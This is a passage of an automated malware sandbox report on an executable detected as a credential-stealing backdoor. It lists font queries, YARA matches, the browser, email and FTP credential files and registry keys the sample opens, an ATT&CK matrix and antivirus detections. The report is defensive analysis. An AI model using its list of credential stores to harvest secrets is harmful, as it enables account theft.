                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Users\user\Desktop\rzN2ckYW24.exe VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_05C45880 GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                Path Interception111
                Process Injection
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Deobfuscate/Decode Files or Information
                1
                Credentials in Registry
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager211
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration11
                Encrypted Channel
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets131
                Virtualization/Sandbox Evasion
                SSHKeyloggingData Transfer Size Limits14
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion
                DCSync1
                System Owner/User Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                Process Injection
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                System Network Configuration Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                rzN2ckYW24.exe30%VirustotalBrowse
                rzN2ckYW24.exe32%ReversingLabsByteCode-MSIL.Backdoor.Androm
                rzN2ckYW24.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                2.0.rzN2ckYW24.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                SourceDetectionScannerLabelLink
                api.ipify.org.herokudns.com0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.sajatypeworks.comiv0%URL Reputationsafe
                http://www.sajatypeworks.comiv0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.sakkal.comrm0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/a-d0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.coma0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/dz0%VirustotalBrowse
                http://www.fontbureau.comF0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://en.wikipedia0%URL Reputationsafe
